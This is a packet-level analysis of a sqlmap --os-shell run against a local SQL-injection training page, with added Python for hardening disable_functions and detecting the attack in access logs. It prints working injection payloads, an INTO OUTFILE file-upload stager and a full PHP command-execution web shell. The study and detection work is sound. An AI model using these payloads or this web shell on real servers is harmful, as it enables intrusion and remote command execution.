Full process, run locally
D:\sqlmap>python2 sqlmap.py -u http://127.0.0.1/SQL/Less-1/?id=1 --os-shell
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.2.11#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:10:10
[23:10:10] [INFO] resuming back-end DBMS 'mysql'
[23:10:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3621=3621 AND 'GLUP'='GLUP
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3041 FROM(SELECT COUNT(*),CONCAT(0x7178787a71,(SELECT (ELT(3041=3041,1))),0x7171787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ErWL'='ErWL
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'spJe'='spJe
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-3185' UNION ALL SELECT NULL,CONCAT(0x7178787a71,0x4362634876576a754d757a6b534357506b55784569476b68786c616f6179476a796c464c6479666e,0x7171787a71),NULL-- KQNY
---
[23:10:10] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.37, PHP 5.6.37
back-end DBMS: MySQL >= 5.0
[23:10:10] [INFO] going to use a web backdoor for command prompt
[23:10:10] [INFO] fingerprinting the back-end DBMS operating system
[23:10:10] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[23:10:27] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: E:\www\apache\Apache24\htdocs
[23:10:50] [WARNING] unable to automatically parse any web server path
[23:10:50] [INFO] trying to upload the file stager on 'E:/www/apache/Apache24/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[23:10:50] [INFO] the file stager has been successfully uploaded on 'E:/www/apache/Apache24/htdocs/' - http://127.0.0.1:80/tmpumgnt.php
[23:10:50] [INFO] the backdoor has been successfully uploaded on 'E:/www/apache/Apache24/htdocs/' - http://127.0.0.1:80/tmpbwejn.php
[23:10:50] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]
command standard output: 'desktop-ei9lgn7xscope'
os-shell>
Running the process above produced 22 HTTP packets in the local capture: 11 requests and 11 responses. Below, each of them is briefly analysed in order.
0x01
Request
GET /SQL/Less-1/?id=1 HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
This time sqlmap only makes a single plain GET request, presumably to check whether the target is reachable.
Note the User-Agent here: sqlmap/1.2.11#stable (http://sqlmap.org)
The local server then returns a response packet with the normal page content.
Response
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:10 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 721
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<font size='5' color= '#99FF00'>Your Login name:Dumb<br>Your Password:Dumb</font></font> </div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>
0x02
Request
GET /SQL/Less-1/?id%5B%5D=1 HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
This request was sent after the following happened:
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[23:10:27] [WARNING] unable to automatically retrieve the web server document root
This time sqlmap appended %5B%5D to the parameter id, which decodes to [], i.e. it passes the parameter to the server as an array. Is the intent to make the site throw an error that reveals the site path? I haven't read the source, so I'm not sure...
The response returned this time differs from the first one.
Response
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:27 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 670
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<font color= "#FFFF00"></font></font> </div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>
0x03
Request
GET /SQL/Less-1/?id=-1086%27%20OR%203105%3D3105%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27E%3A%2Fwww%2Fapache%2FApache24%2Fhtdocs%2Ftmpumgnt.php%27%20LINES%20TERMINATED%20BY%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--%20- HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
The parameter of the third request is noticeably long; decoded, it reads as follows
id=-1086' OR 3105=3105 LIMIT 0,1 INTO OUTFILE 'E:/www/apache/Apache24/htdocs/tmpumgnt.php' LINES TERMINATED BY <?php
if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\www\apache\Apache24\htdocs\> <input type=submit name=upload value=upload></form>";}?>
This uses MySQL's SELECT ... INTO OUTFILE ... LINES TERMINATED BY to write the script to disk
Expanded, the code is:
<?php
if (isset($_REQUEST["upload"])){
    $dir=$_REQUEST["uploadDir"];
    if (phpversion()<'4.1.0'){
        $file=$HTTP_POST_FILES["file"]["name"];
        @move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();
    }
    else{
        $file=$_FILES["file"]["name"];
        @move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();
    }
    @chmod($dir."/".$file,0755);
    echo "File uploaded";
}
else {
    echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\www\apache\Apache24\htdocs\> <input type=submit name=upload value=upload></form>";
}?>
It provides a file-upload function.
The response this time is exactly the same as the second response.
Response
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 670
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<font color= "#FFFF00"></font></font> </div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>
Requests four through eight are all used to work out where the uploaded file ended up; the number of requests here appears to depend on the depth of the path E:/www/apache/Apache24/htdocs/tmpumgnt.php given in 0x02
0x04
Request
GET /www/apache/Apache24/htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 237
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /www/apache/Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>
0x05
Request
GET /apache/Apache24/htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 233
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /apache/Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>
0x06
Request
GET /Apache24/htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>
0x07
Request
GET /htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 217
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>
0x08
Request
GET /tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 330
Connection: close
Content-Type: text/html; charset=UTF-8
1 Dumb Dumb<form action=/tmpumgnt.php method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\www\apache\Apache24\htdocs\> <input type=submit name=upload value=upload></form>
0x09
Request
POST /tmpumgnt.php?id=1 HTTP/1.1
Content-Length: 1334
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Host: 127.0.0.1
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=169.254.227.55.1.10780.1558019450.459.1
--169.254.227.55.1.10780.1558019450.459.1
Content-Disposition: form-data; name="uploadDir"
E:\www\apache\Apache24\htdocs\
--169.254.227.55.1.10780.1558019450.459.1
Content-Disposition: form-data; name="upload"
1
--169.254.227.55.1.10780.1558019450.459.1
Content-Disposition: form-data; name="file"; filename="tmpbwejn.php"
Content-Type: application/octet-stream
<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);$z=@ini_get('disable_functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1
";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre>".$w."</pre>";?>
--169.254.227.55.1.10780.1558019450.459.1--
Expanded code:
<?php
$c=$_REQUEST["cmd"];
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('max_execution_time',0);
$z=@ini_get('disable_functions');
if(!empty($z)){
    $z=preg_replace('/[, ]+/',',',$z);
    $z=explode(',',$z);
    $z=array_map('trim',$z);
}
else{
    $z=array();
}
$c=$c." 2>&1
";
function f($n){
    global $z;
    return is_callable($n)and!in_array($n,$z);
}
if(f('system')){
    ob_start();
    system($c);
    $w=ob_get_contents();
    ob_end_clean();
}
elseif(f('proc_open')){
    $y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);
    $w=NULL;
    while(!feof($t[1])){
        $w.=fread($t[1],512);
    }
    @proc_close($y);
}
elseif(f('shell_exec')){
    $w=shell_exec($c);
}
elseif(f('passthru')){
    ob_start();
    passthru($c);
    $w=ob_get_contents();
    ob_end_clean();
}
elseif(f('popen')){
    $x=popen($c,r);
    $w=NULL;
    if(is_resource($x)){
        while(!feof($x)){
            $w.=fread($x,512);
        }
    }
    @pclose($x);
}
elseif(f('exec')){
    $w=array();
    exec($c,$w);
    $w=join(chr(10),$w).chr(10);
}
else{
    $w=0;
}
print "<pre>".$w."</pre>";?>
The script first takes the value of cmd from the client request and assigns it to $c
Sets the script's maximum execution time to unlimited
Sets the script to keep running even if the client disconnects
Reads the list of disabled functions from the configuration and assigns it to $z
If the disabled-function list $z is not empty
- Replace every run of commas or spaces in the list with a single comma and assign the result back to $z
- Then split the list on commas into an array and assign it back to $z
- Trim leading and trailing whitespace from every element and assign the result back to $z
If the disabled-function list is empty, initialise $z as an empty array
Then $c = $c . " 2>&1 " (stderr is redirected into stdout)
Define function f($n)
- Pull in the global variable $z
- Return true if $n is callable and not in the array $z, otherwise return false
If f('system') is true
- Start output buffering
- Run the cmd command $c
- Copy the buffer contents into $w
- Discard the buffer and end output buffering
Otherwise, if f('proc_open') is true
- It seems to spawn a child process, run the command, and write the result into a pipe
- Read the command's result from the pipe into $w
- Close the process resource
Otherwise, if f('shell_exec') is true
- Run the command through the shell and return the result into $w
Otherwise, if f('passthru') is true
- Start output buffering
- Run the command
- Copy the buffer contents into $w
- Discard the buffer and end output buffering
Otherwise, if f('popen') is true
- Open a pipe to a process, run the command, and get back a file pointer $x like the one fopen() returns
- Read the resource that pointer refers to into $w
- Close the resource $x
Otherwise, if f('exec') is true
- Initialise $w as an empty array
- Run the command and fill the array $w with its output lines
- Join the array $w into a single string with chr(10) (newline) between the lines
Otherwise
- $w = 0
Finally print "<pre>".$w."</pre>"
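The fallback chain above only succeeds if at least one of the six execution primitives survives php.ini's disable_functions. The following is an added example for this write-up, not sqlmap's code: it re-implements the backdoor's own list normalisation (runs of commas or spaces collapsed to a comma, split, trim) in Python, so a defender can check offline which branch f($n) would still accept for a candidate setting. It assumes every primitive is compiled into the interpreter; the two sample settings are constructed.

```python
"""Coverage check for a php.ini disable_functions value against the
backdoor's if/elseif fallback chain (added example, not sqlmap's code)."""
import re
from typing import List, Optional

# Branch order of the backdoor's chain, as walked through above.
FALLBACK_CHAIN = ("system", "proc_open", "shell_exec", "passthru", "popen", "exec")


def parse_disable_functions(value: str) -> List[str]:
    """Mirror of preg_replace('/[, ]+/', ',') + explode(',') + array_map('trim')."""
    if not value.strip():  # empty(): the backdoor falls back to an empty array
        return []
    collapsed = re.sub(r"[, ]+", ",", value)
    return [name.strip() for name in collapsed.split(",") if name.strip()]


def uncovered_primitives(disable_functions: str) -> List[str]:
    """Chain members not listed, i.e. the ones f($n) would report as usable
    (assumption: every primitive is compiled into the interpreter)."""
    blocked = set(parse_disable_functions(disable_functions))
    return [name for name in FALLBACK_CHAIN if name not in blocked]


def branch_taken(disable_functions: str) -> Optional[str]:
    """First branch the backdoor would reach, or None if it falls through to $w = 0."""
    remaining = uncovered_primitives(disable_functions)
    return remaining[0] if remaining else None


# Constructed settings: a common partial list and one that covers the whole chain.
WEAK_SETTING = "exec,passthru,shell_exec"
COVERING_SETTING = "system, proc_open, shell_exec,passthru,popen,exec"

if __name__ == "__main__":
    for label, setting in (("weak", WEAK_SETTING), ("covering", COVERING_SETTING)):
        print(f"{label}: uncovered={uncovered_primitives(setting)} "
              f"branch={branch_taken(setting)}")
```

With the weak setting the backdoor never reaches the blocked functions at all, because system() is tried first and is still callable; the check makes that ordering visible instead of leaving it to a reading of the chain.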
Response
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 24
Connection: close
Content-Type: text/html; charset=UTF-8
1 Dumb DumbFile uploaded
0x0a
Request
GET /tmpbwejn.php?cmd=echo%20command%20execution%20test HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 36
Connection: close
Content-Type: text/html; charset=UTF-8
<pre>command execution test
</pre>
0x0b
Request
GET /tmpbwejn.php?cmd=whoami HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:11:08 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 36
Connection: close
Content-Type: text/html; charset=UTF-8
<pre>desktop-ei9lgn7xscope
</pre>
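Seen from the server side, the whole sequence 0x01 to 0x0b leaves several distinct traces in the access log: the sqlmap User-Agent on every request, the id[] array probe (0x02), a SELECT ... INTO OUTFILE in a query string (0x03), one file name requested with successively shorter directory prefixes (0x04 to 0x08), and a cmd= parameter sent to a freshly created .php file (0x0a, 0x0b). The following is an added example for this write-up, not code from the original post or from sqlmap: it rebuilds the eleven requests as constructed Apache combined-format log lines (timestamps, sizes and a benign twelfth line are constructed; the hex payload of 0x03 is truncated) and runs those rules over them. The rules are written slightly more generally than the capture needs: the file-write rule also matches INTO DUMPFILE, and the prefix rule matches any client walking one file name up a directory tree.

```python
"""Access-log detection rules for the sqlmap --os-shell sequence analysed
above (added example; log lines are constructed, not from the capture)."""
import re
from collections import defaultdict
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote_plus, urlsplit

SQLMAP_UA = "sqlmap/1.2.11#stable (http://sqlmap.org)"


def _entry(ts: str, request: str, status: int, size: int,
           ip: str = "127.0.0.1", ua: str = SQLMAP_UA) -> str:
    """Build one constructed combined-format line."""
    return f'{ip} - - [16/May/2019:{ts} +0800] "{request} HTTP/1.1" {status} {size} "-" "{ua}"'


SAMPLE_LOG = [  # constructed from requests 0x01-0x0b, plus one ordinary visit
    _entry("23:10:10", "GET /SQL/Less-1/?id=1", 200, 721),
    _entry("23:10:27", "GET /SQL/Less-1/?id%5B%5D=1", 200, 670),
    _entry("23:10:50", "GET /SQL/Less-1/?id=-1086%27%20OR%203105%3D3105%20LIMIT%200%2C1%20INTO%20OUTFILE"
           "%20%27E%3A%2Fwww%2Fapache%2FApache24%2Fhtdocs%2Ftmpumgnt.php%27%20LINES%20TERMINATED%20BY"
           "%200x3c3f706870--%20-", 200, 670),  # hex payload truncated in this sample
    _entry("23:10:50", "GET /www/apache/Apache24/htdocs/tmpumgnt.php", 404, 237),
    _entry("23:10:50", "GET /apache/Apache24/htdocs/tmpumgnt.php", 404, 233),
    _entry("23:10:50", "GET /Apache24/htdocs/tmpumgnt.php", 404, 226),
    _entry("23:10:50", "GET /htdocs/tmpumgnt.php", 404, 217),
    _entry("23:10:50", "GET /tmpumgnt.php", 200, 330),
    _entry("23:10:50", "POST /tmpumgnt.php?id=1", 200, 24),
    _entry("23:10:50", "GET /tmpbwejn.php?cmd=echo%20command%20execution%20test", 200, 36),
    _entry("23:11:08", "GET /tmpbwejn.php?cmd=whoami", 200, 36),
    _entry("23:12:00", "GET /SQL/Less-1/?id=2", 200, 721, ip="10.0.0.5", ua="Mozilla/5.0"),
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line: str) -> Optional[dict]:
    """Split one combined-format line and decode its query string."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = unquote_plus(parts.query)  # one level of %XX decoding
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def per_request_tags(rec: dict) -> List[str]:
    """Rules that need only a single request."""
    tags = []
    if "sqlmap/" in rec["ua"]:  # the User-Agent seen on every request above
        tags.append("sqlmap-user-agent")
    if any(k.endswith("[]") for k in rec["params"]):  # id[]=1 probe (0x02)
        tags.append("array-param-probe")
    q = rec["query"].upper()
    if "INTO OUTFILE" in q or "INTO DUMPFILE" in q:  # file written via SQL (0x03)
        tags.append("sql-file-write")
    if "cmd" in rec["params"] and rec["path"].lower().endswith(".php"):
        tags.append("cmd-param-to-php")  # backdoor use (0x0a, 0x0b)
    return tags


def path_probe_lines(recs: List[dict]) -> List[int]:
    """One client fetching the same file name with successively shorter prefixes (0x04-0x08)."""
    groups = defaultdict(list)
    for r in recs:
        base = r["path"].rsplit("/", 1)[-1]
        if base:
            groups[(r["ip"], base)].append(r)
    lines = set()
    for group in groups.values():
        uniq = sorted({r["path"] for r in group}, key=len, reverse=True)
        if len(uniq) >= 3 and all(uniq[0].endswith(p) for p in uniq[1:]):
            lines.update(r["n"] for r in group)
    return sorted(lines)


def scan(lines: List[str]) -> Dict[str, List[int]]:
    """Return {rule: [1-based log line numbers]} for every rule that fired."""
    findings: Dict[str, List[int]] = defaultdict(list)
    recs = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            findings["unparsed"].append(n)
            continue
        rec["n"] = n
        recs.append(rec)
        for tag in per_request_tags(rec):
            findings[tag].append(n)
    probe = path_probe_lines(recs)
    if probe:
        findings["path-prefix-probe"] = probe
    return dict(findings)


if __name__ == "__main__":
    for rule, hits in sorted(scan(SAMPLE_LOG).items()):
        print(f"{rule:20} lines {hits}")
```

The User-Agent rule is the weakest of the five, since it is trivially changed on the client side; the path-prefix and sql-file-write rules key on the mechanics of the stager upload itself and fire regardless of what client produced the traffic.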